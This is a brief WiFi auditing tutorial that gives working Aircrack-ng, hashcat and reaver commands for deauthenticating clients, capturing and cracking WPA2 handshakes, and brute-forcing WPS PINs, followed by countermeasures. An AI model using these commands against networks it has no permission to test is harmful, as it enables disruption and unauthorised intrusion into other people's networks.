Wireless Network Auditing

WiFi security auditing guide with Aircrack-ng: WPA2 handshake capture, dictionary cracking and WPS attacks.

Legal Warning: Only audit networks you own or have explicit written permission to test.

1. Enable Monitor Mode

airmon-ng check kill
airmon-ng start wlan0   # Creates wlan0mon

2. Network Discovery

airodump-ng wlan0mon
# Shows: BSSID, Channel, Encryption, SSID, Connected clients

3. Capture WPA2 Handshake

airodump-ng -c [CH] --bssid [AP_MAC] -w capture wlan0mon
# Force deauth to capture re-handshake:
aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon

4. Crack the Handshake

# Aircrack-ng (CPU):
aircrack-ng -w rockyou.txt capture-01.cap

# Hashcat (GPU — much faster):
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt

5. WPS Attack

wash -i wlan0mon              # Find WPS-enabled APs
reaver -i wlan0mon -b [AP_MAC] -vv     # Brute force PIN
reaver -i wlan0mon -b [AP_MAC] -vv -K 1  # Pixie Dust

6. Countermeasures

Measure	Description
Use WPA3	Most secure protocol — uses SAE instead of PSK
Long random passphrase	20+ chars — impossible to dictionary-crack
Disable WPS	WPS 8-digit PIN is vulnerable to brute force
Guest network	Isolate IoT devices and visitors